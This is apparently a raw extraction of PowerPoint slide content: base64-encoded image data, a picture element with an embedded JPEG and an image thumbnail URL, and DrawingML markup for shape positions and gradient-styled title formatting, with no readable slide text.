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9" descr="data:image/jpeg;base64,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218" name="Picture 2" descr="https://encrypted-tbn2.google.com/images?q=tbn:ANd9GcQNKEZHKCYwRl28QKrKPLwNuP0u0w_cB_ZiHZdYzS5mEJKKlvHtU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56977" y="1676401"/>
            <a:ext cx="2124075" cy="215265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4D3F01B-2073-3E55-7B3B-6D801EB049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5065" y="4419600"/>
            <a:ext cx="2247900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9508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001000" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" b="1" cap="all" dirty="0">
                <a:ln w="5000" cmpd="sng">
                  <a:solidFill>
                    <a:schemeClr val="accent1">
                      <a:tint val="80000"/>
                      <a:shade val="99000"/>
                      <a:satMod val="50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63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="9000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="53000">
                      <a:schemeClr val="accent1">
                        <a:shade val="60000"/>
                        <a:satMod val="100000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="90000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:schemeClr val="accent1">
                        <a:tint val="63000"/>
                        <a:satMod val="255000"/>
                      </a:schemeClr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prstClr val="black">
